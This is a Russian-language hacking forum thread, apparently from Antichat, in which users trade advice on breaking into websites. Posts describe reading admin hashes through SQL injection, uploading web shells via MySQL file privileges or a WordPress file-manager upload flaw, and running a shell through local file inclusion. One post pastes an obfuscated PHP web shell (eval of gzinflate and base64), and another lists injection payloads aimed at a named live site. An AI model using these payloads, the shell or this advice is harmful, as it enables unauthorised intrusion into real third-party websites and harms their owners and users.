народ есть сайт со скулью прочитал хеш админа но спустя пару поисков пароля к хешу я решился сделать след. метод Update чтение файла загрузка шелла все это бесполезно так вот если еще варианты кроме как расш. хеша???
diznt разшифровать пасс от мускула) xcedz полезно, но иногда каждый сайт на серваке управляется под своим пользователем )
sabe боже упаси не думаешь совсем... народ есть сайт со скулью прочитал хеш админа но спустя пару поисков пароля к хешу я решился сделать след. метод Update чтение файла загрузка шелла все это бесполезно так вот если еще варианты кроме как расш. хеша???
Реверс IP ...возможно там ещё не мало бажных сайтов...А там уже или Рутать-если получетца....или если доступен mysql.user пробывать подключиттца к бд, и подменить хешь на время.... Update это врятле..если только иньекция в апдайте..... Загрузка шелла-если есть file_priv Y...И если не фильтруютца ' ...Если file_priv всё же есть...найди конфиг подключ к мускулю, и го на 3306 порт или исчи пхпмайадмин .....)
чтобы загрузить шелл нужно не только file_priv Y, но и знание пути относительно корня к доступной для записи папке...
Всем привет! Я новичёк и мне хотелось бы узнать как пользоваться одной уязвимостью. Есть такая уязвимость: Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability Я нашёл сайты, где можно зайти в /ajaxfilemanager/ajaxfilemanager.php, но там файлы с расширением .php всё равно нельзя заливать, и переименовывать расширения тоже нельзя. Скажите пожалуйста, так как всё-таки можно воспользоваться этой уязвимостью, чтобы скинуть на уязвимый сервер желанный shell.php.
Всё равно ничего не понимаю. Ну залил я shell.php.gif, вбил в адресную строку путь, нажал ентер и чего? Ничего не происходит и произойти не может, ведь тогда надо чтобы .gif-файлы воспринимались апачем как phpшные. А переименовывать расширения ajaxfilemanager не даёт.
Вот ещё, искал уязвимые сайты c ajaxfilemanager'ом и на одном из них в папке uploads увидел файлик 1.txt: PHP: <?PHP $login = ""; $pass = ""; $md5_pass = ""; eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//cfWUXldLpKsQ2LCH7EcnuYdrqeqDHEDz+4uJYWH3YLflGUnDJ40DjU/AL1miwEJPpBWlsAxTrgB46jRW/00XpggW00yDI/H1kD7UqxI/3qjQZ4vz7HLsfNVW1BeQKiVH2VTrXtoiaKYdkT4o/p1E8W/n5eVhagV7GanBn0U7OCfD7zPbCQyO0N/QGtstthqJBia5QJsR6xCgkHpBo1kQMlLt6u++SBvtw5KSMwtG4R2yctd0mBNrlB3QQo4aQKGRgRjTa0xYFw1vVM9ySOMd44sSrPeSG8JPyOyEpK+U0y8d4n2EzI9MDdnlMkLKQQ8ZIYPW3sF4lUFF9gO8AjT5ceta4HM7HkZi7S2yoAAPLD8D7Pn4kD6t1EIkHYORMtJBdqcseuvOO5HcoLJO4b5UENDkOEq25EeU3GFSPIGFBzJVwCzJ+KG8VOSwioKtYkBfa475CUIwdsd2UCyyIjzNcV1Qd9O7V5LLYSNRQVmxHk58dAQsHToc5po9kwIqw/hW7jSjN7DOxqpycbxRsWryNR1Rk/zW9H0SJC6YuDooqAb74a+JoAsnsNw3RXTOYnEXyrUypwzGj1mFxn4joUYcBpPKZFnhZduMJ3N+iJGv0jxauM6oyrlDbzOteU/HxgXvt+oAkr1f10Y+5qUWycE6pwbQ8H7wXaNVwgSOR32uZqe04M7our2o/LBaJAzymHcrv5fAck4wdz+3i0V+uKI0X0aPSSdkiL6Y6kX6oPgXzgZhzywXLbbWzgCbQU50FMMYZsMU3hMt8lTceW4tQybP1tleF8AmARZ8SE4R3YLqauuSz8YMVcZAqlYIMDXrNTyTNxOVWUgtMiinhJN3ZVlU5/9uNqLIlwxvkKjJT5u8giHlZLEPr42p7lKCUnNyKhDtPtsLCEynwLp9Q5o/0lEcX2R0PWtQMovxL2lXNi4JPC16wv8pTDt5qOxe3qji/MoJHDj0qiOIVNI1i8/yvN9O6CGCzKd6v7wn5OIdyk46ReFluKuqs4Id58NtSSzC/v/nyO5q/YQjtmH0j7xniAOr9EUrv0xLTydVtCB1z+7TMGAHY5KaM9o37W/GQ/frFJetfqlRGO6FSRTMm7ILSm35o5z4+v0mcf4KaHgKS5Y17eqqvD2mmN8NzteyplNd6WOwrQVK445J/y01lvAIH6lMiK+71uQ/k6M/hZSctkD8jEhizy8LiW5zRxFHFl1W9Ifg04kxfGUoKag8MxFI3Ko8H3xfgPmkQY0NuF8A+EMvs5NJPfiajdJZ0cW5MOr/W6s6HB0Se1HGX25egxPln3ZgPGYTTiCmJf1rjs6jSqEXXXmJBhMpsc2qEDo4/XN2oqJYOi96eaO77GFxsIrhmJYZNM8FVXFjDioh6frIMa6LJHddnSw8iyjdP/jGafIjtHUqTkmneVvuPXxySKri/9nj+s8p2jqeN1P9GacySffJByBAJ2K7kOx3E3TMlvs+G/mKXLZX4gkx88oBBM4azy+KikrI3q23MqT+eB4D6Yi1ddZkNX7wYFce63KZ/ij0kiKA57Hz5YmNHbn8wB6jYiuA1St5kjuj1INkWGuO9Y55gN2ba3KYccXbIySqxnok4havZPJ+1KTcDbXNSUpI3bFMVHka4AmmBP7WPCQcpntcvmK4Me5QNCTmo4Zbjmmnw/IJ6EzgirhU/ //.........................ВЫРЕЗАНО..........................// rV2dQtN498uRXwY64HCeR7Eom8nCZqkQdOsesDDJDkiO/2qAPFjmCCt/NtOW25X6lZSd+GEJdAIreMaLwl1uooZJIH9KhOsdOr9yWEt18K7nuz8zUo4KFv1ozJHtKxggwGoA5bjfwOlz72oOlouJNV7s+hPls5rCO5Byj8eGnAOOrUyCrzEVpF+cQUpMZ/NqCOvo1bw0oA6DL8PREp2ZpQ+q0s+A/i7Mj3LHkrzvhlg0PSF9I0XzCOnfOuoKr4rL0mIqrhUJVGvcyXWifopA16M9qhm3X2/22yufpovnpXYbIANy24CsXoZ1f3Tpjezrdv3mhUeKRpeqdYiPYCo3Vf4Ld+UiH/Plpsl7Q0K7Yq1HvBSwCHw3hcJZvJ9DiN6kJd8GXWR8A0g6gN7efyolFZmXJSkfJ4ij9uzIk5Fn0+lSuVovCgr1UW9umOF1rZVfueHA/r9+bW9futJj1ZETFtfo+lljEkrKNphM1vsYofR0nLNeISTcx8JB+CzvCtPbkQvCREz20jzOWmhyA7i568zaZRQTLfO1zS9vP34kMfb0ii5c+X5DkZvfWI3aIzo7w2zgBBe0pcyEAwf140DKTG2tU2+VdCzI0EQCSltagkiugrm3k1ctsnnNIyilfDkQNlNND7qml51xkiT0d5Mukc17Bfs2DXdUn7Dj5qynymWRcvydcWUwnbOTvD9ABmSDz4AF5FV9omxSL/GO2OYowPCYGfNXBVAg6DPa84jA7JJJ6O+QdUv51FR/1dnx89M8P6H7P1qgSq3fbEqwSKgC2OCB6Gds5T7dJIsm2wrS+Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));//xek ?> Походу уже кто-то залил туда шелл. Только я никак не могу понять, КАК же им воспользоваться? И что от него толку, если он с расширением .txt? Объясните пожалуйста новичку.
2_gr34t Воспользоваться можно через локальный инклуд. Тогда все равно какое расширение у файла. Если найдешь то указывай ЛОКАЛЬНЫЙ путь к шеллу - он выполнится. Да и еще, ты сказал что нельзя лить файлы с расширением .php попробуй .htm или .html
Помогите плиз скуль http://ktv-spb.ru/admin/aut.php?user=' http://ktv-spb.ru/admin/aut.php?user=-1'order+by+2/* показывает 2 столбца http://ktv-spb.ru/admin/aut.php?user=-1'union+select+1,2/* неработает http://ktv-spb.ru/admin/aut.php?user='or+ASCII(substring(version(),1,1))>1/* посимвольно тоже неполучается
Товарищи Античатовцы, есть серьезный вопрос: где админка сайта eastandard.net? . Я замучался искать .
